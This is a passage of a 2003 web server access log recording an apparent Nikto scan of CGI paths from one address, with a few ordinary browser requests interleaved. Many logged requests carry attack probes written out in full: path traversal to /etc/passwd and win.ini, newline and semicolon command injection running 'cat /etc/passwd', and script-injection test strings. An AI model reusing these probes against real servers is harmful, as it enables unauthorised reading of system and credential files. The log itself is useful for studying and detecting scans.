/cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc/passwd HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:54 +0900] "GET /cgi.cgi/nlog-smb.cgi HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:55 +0900] "GET /cgi-bin/nlog-smb.cgi HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:55 +0900] "GET /cgi.cgi/nlog-smb.pl HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:56 +0900] "GET /cgi-bin/nlog-smb.pl HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:57 +0900] "GET /cgi.cgi/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 403 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:58 +0900] "GET /cgi-bin/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:58 +0900] "GET /cgi.cgi/nph-maillist.pl HTTP/1.0" 403 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:59 +0900] "GET /cgi-bin/nph-maillist.pl HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:00 +0900] "GET /cgi.cgi/nph-publish HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:00 +0900] "GET /cgi-bin/nph-publish HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:01 +0900] "GET /cgi.cgi/nph-publish.cgi HTTP/1.0" 403 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:02 +0900] "GET /cgi-bin/nph-publish.cgi HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:03 +0900] "GET /cgi.cgi/nph-test-cgi HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:03 +0900] "GET /cgi-bin/nph-test-cgi HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:04 +0900] "GET /cgi.cgi/ntitar.pl HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:05 +0900] "GET /cgi-bin/ntitar.pl HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:05 +0900] "GET /cgi.cgi/opendir.php?/etc/passwd HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:06 +0900] "GET /cgi-bin/opendir.php?/etc/passwd HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:07 +0900] "GET /cgi.cgi/orders/orders.txt HTTP/1.0" 403 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:08 +0900] "GET /cgi-bin/orders/orders.txt HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:08 +0900] "GET /cgi.cgi/pagelog.cgi HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:09 +0900] "GET /cgi-bin/pagelog.cgi HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:10 +0900] "GET /cgi.cgi/pals-cgi?palsAction=restart&documentName=/etc/passwd HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:11 +0900] "GET /cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:11 +0900] "GET /cgi.cgi/pass HTTP/1.0" 403 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:12 +0900] "GET /cgi-bin/pass HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:13 +0900] "GET /cgi.cgi/passwd HTTP/1.0" 403 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:13 +0900] "GET /cgi-bin/passwd HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:14 +0900] "GET /cgi.cgi/passwd.txt HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:15 +0900] "GET /cgi-bin/passwd.txt HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:16 +0900] "GET /cgi.cgi/password HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:16 +0900] "GET /cgi-bin/password HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:17 +0900] "GET /cgi.cgi/pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:18 +0900] "GET /cgi-bin/pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:18 +0900] "GET /cgi.cgi/perl HTTP/1.0" 403 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:19 +0900] "GET /cgi-bin/perl HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:20 +0900] "GET /cgi.cgi/perl.exe HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:21 +0900] "GET /cgi-bin/perl.exe HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:21 +0900] "GET /cgi.cgi/perl.exe?-v HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:22 +0900] "GET /cgi-bin/perl.exe?-v HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:23 +0900] "GET /cgi.cgi/perl?-v HTTP/1.0" 403 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:23 +0900] "GET /cgi-bin/perl?-v HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:24 +0900] "GET /cgi.cgi/perlshop.cgi HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:25 +0900] "GET /cgi-bin/perlshop.cgi HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:26 +0900] "GET /cgi.cgi/pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|' HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:26 +0900] "GET /cgi-bin/pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|' HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:27 +0900] "GET /cgi.cgi/pfdispaly.cgi?../../../../../../../../../../etc/passwd HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:28 +0900] "GET /cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:28 +0900] "GET /cgi.cgi/pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|' HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:29 +0900] "GET /cgi-bin/pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|' HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:30 +0900] "GET /cgi.cgi/phf HTTP/1.0" 403 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:31 +0900] "GET /cgi-bin/phf HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:31 +0900] "GET /cgi.cgi/phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 403 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:32 +0900] "GET /cgi-bin/phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:33 +0900] "GET /cgi.cgi/phf?Qname=root%0Acat%20/etc/passwd%20 HTTP/1.0" 403 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:34 +0900] "GET /cgi-bin/phf?Qname=root%0Acat%20/etc/passwd%20 HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:34 +0900] "GET /cgi.cgi/php-cgi HTTP/1.0" 403 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:35 +0900] "GET /cgi-bin/php-cgi HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:36 +0900] "GET /cgi.cgi/php.cgi?/etc/passwd HTTP/1.0" 403 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:36 +0900] "GET /cgi-bin/php.cgi?/etc/passwd HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:37 +0900] "GET /cgi.cgi/plusmail HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:38 +0900] "GET /cgi-bin/plusmail HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:39 +0900] "GET /cgi.cgi/pollit/Poll_It_SSI_v2.0.cgi?data_dir=\\etc\\passwd%00 HTTP/1.0" 403 311 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:39 +0900] "GET /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=\\etc\\passwd%00 HTTP/1.0" 404 307 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:40 +0900] "GET /cgi.cgi/pollssi.cgi HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:41 +0900] "GET /cgi-bin/pollssi.cgi HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:41 +0900] "GET /cgi.cgi/postcards.cgi HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:42 +0900] "GET /cgi-bin/postcards.cgi HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:43 +0900] "GET /cgi.cgi/post_query HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:44 +0900] "GET /cgi-bin/post_query HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:44 +0900] "GET /cgi.cgi/powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:45 +0900] "GET /cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:46 +0900] "GET /cgi.cgi/ppdscgi.exe HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:47 +0900] "GET /cgi-bin/ppdscgi.exe HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:47 +0900] "GET /cgi.cgi/processit.pl HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:48 +0900] "GET /cgi-bin/processit.pl HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:49 +0900] "GET /cgi.cgi/profile.cgi HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:49 +0900] "GET /cgi-bin/profile.cgi HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:50 +0900] "GET /cgi.cgi/pu3.pl HTTP/1.0" 403 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:51 +0900] "GET /cgi-bin/pu3.pl HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:52 +0900] "GET /cgi.cgi/publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10 HTTP/1.0" 403 304 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:52 +0900] "GET /cgi-bin/publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10 HTTP/1.0" 404 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:55:53 +0900] "GET /cgi.cgi/query?mss=%2e%2e/config HTTP/1.0" 403 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:04 +0900] "GET /cgi.cgi/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id= HTTP/1.0" 403 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:04 +0900] "GET /cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id= HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:05 +0900] "GET /cgi.cgi/quizme.cgi HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:06 +0900] "GET /cgi-bin/quizme.cgi HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:07 +0900] "GET /cgi.cgi/r.cgi?FILE=../../../../../../../../../../etc/passwd HTTP/1.0" 403 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:07 +0900] "GET /cgi-bin/r.cgi?FILE=../../../../../../../../../../etc/passwd HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:08 +0900] "GET /cgi.cgi/ratlog.cgi HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:09 +0900] "GET /cgi-bin/ratlog.cgi HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:09 +0900] "GET /cgi.cgi/replicator/webpage.cgi/ HTTP/1.0" 403 307 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:19 +0900] "GET /cgi-bin/replicator/webpage.cgi/ HTTP/1.0" 404 303 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:20 +0900] "GET /cgi.cgi/responder.cgi HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:21 +0900] "GET /cgi-bin/responder.cgi HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:21 +0900] "GET /cgi.cgi/retrieve_password.pl HTTP/1.0" 403 304 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:22 +0900] "GET /cgi-bin/retrieve_password.pl HTTP/1.0" 404 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:23 +0900] "GET /cgi.cgi/rguest.exe HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:24 +0900] "GET /cgi-bin/rguest.exe HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:24 +0900] "GET /cgi.cgi/rksh HTTP/1.0" 403 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:25 +0900] "GET /cgi-bin/rksh HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:26 +0900] "GET /cgi.cgi/rmp_query HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:26 +0900] "GET /cgi-bin/rmp_query HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:26 +0900] "GET /php/ HTTP/1.1" 404 285 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02" 212.92.77.254 - - [24/Jul/2003:01:56:27 +0900] "GET /cgi.cgi/robadmin.cgi HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:28 +0900] "GET /cgi-bin/robadmin.cgi HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:29 +0900] "GET /cgi.cgi/robpoll.cgi HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:29 +0900] "GET /cgi-bin/robpoll.cgi HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:30 +0900] "GET /cgi.cgi/rpm_query HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:31 +0900] "GET /cgi-bin/rpm_query HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:31 +0900] "GET /cgi.cgi/rsh HTTP/1.0" 403 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:32 +0900] "GET /cgi-bin/rsh HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:33 +0900] "GET /cgi.cgi/rtm.log HTTP/1.0" 403 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:34 +0900] "GET /cgi-bin/rtm.log HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:34 +0900] "GET /cgi.cgi/rwcgi60 HTTP/1.0" 403 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:35 +0900] "GET /cgi-bin/rwcgi60 HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:36 +0900] "GET /cgi.cgi/rwcgi60/showenv HTTP/1.0" 403 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:36 +0900] "GET /cgi-bin/rwcgi60/showenv HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:37 +0900] "GET /cgi.cgi/rwwwshell.pl HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:38 +0900] "GET /cgi-bin/rwwwshell.pl HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:39 +0900] "GET /cgi.cgi/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1 HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:39 +0900] "GET /cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1 HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:40 +0900] "GET /cgi.cgi/sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3 HTTP/1.0" 403 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:41 +0900] "GET /cgi-bin/sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3 HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:41 +0900] "GET /cgi.cgi/scoadminreg.cgi HTTP/1.0" 403 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:42 +0900] "GET /cgi-bin/scoadminreg.cgi HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:43 +0900] "GET /cgi.cgi/search.cgi HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:44 +0900] "GET /cgi-bin/search.cgi HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:44 +0900] "GET /cgi.cgi/search.cgi?..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\windows\\\\win.ini HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:45 +0900] "GET /cgi-bin/search.cgi?..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\windows\\\\win.ini HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:46 +0900] "GET /cgi.cgi/search.cgi?..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\winnt\\\\win.ini HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:47 +0900] "GET /cgi-bin/search.cgi?..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\winnt\\\\win.ini HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:47 +0900] "GET /cgi.cgi/search.pl HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:48 +0900] "GET /cgi-bin/search.pl HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:50 +0900] "GET /cgi.cgi/search.pl?form=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:51 +0900] "GET /cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:51 +0900] "GET /cgi.cgi/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script> HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:52 +0900] "GET /cgi-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script> HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:53 +0900] "GET /cgi.cgi/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc HTTP/1.0" 403 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:53 +0900] "GET /cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:54 +0900] "GET /cgi.cgi/sendform.cgi HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:55 +0900] "GET /cgi-bin/sendform.cgi HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:56 +0900] "GET /cgi.cgi/sendpage.pl HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:56 +0900] "GET /cgi-bin/sendpage.pl HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:57 +0900] "GET /cgi.cgi/sendtemp.pl?templ=../../../../../../../../../../etc/passwd HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:58 +0900] "GET /cgi-bin/sendtemp.pl?templ=../../../../../../../../../../etc/passwd HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:58 +0900] "GET /php/ HTTP/1.1" 200 902 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02" 212.92.77.254 - - [24/Jul/2003:01:56:58 +0900] "GET /cgi.cgi/session/adminlogin HTTP/1.0" 403 302 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:59 +0900] "GET /favicon.ico HTTP/1.1" 404 295 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02" 212.92.77.254 - - [24/Jul/2003:01:56:59 +0900] "GET /icons/back.gif HTTP/1.1" 200 216 "http://ddd.ddd.ddd.ddd/php/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02" 212.92.77.254 - - [24/Jul/2003:01:56:59 +0900] "GET /cgi-bin/session/adminlogin HTTP/1.0" 404 298 "-" 